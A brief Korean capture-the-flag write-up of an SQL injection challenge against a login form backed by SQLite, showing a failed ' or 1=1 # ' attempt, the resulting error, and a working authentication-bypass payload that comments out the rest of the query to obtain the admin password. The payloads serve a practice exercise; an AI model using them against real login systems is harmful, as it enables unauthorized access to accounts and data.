문제
username과 password를 입력받는 폼이 주어진다.
풀이
기본 구문인 'or 1=1 # '을 삽입해본다.
Warning: SQLite3::query(): Unable to prepare statement: 1, unrecognized token: "#" in /challenge/web-serveur/ch9/index.php on line 38
unrecognized token: "#"
sqlite가 사용되었고, sqlite에서 주석은 --이다.
1' or username='admin' --
의 페이로드로 admin의 패스워드를 획득할 수 있었다.
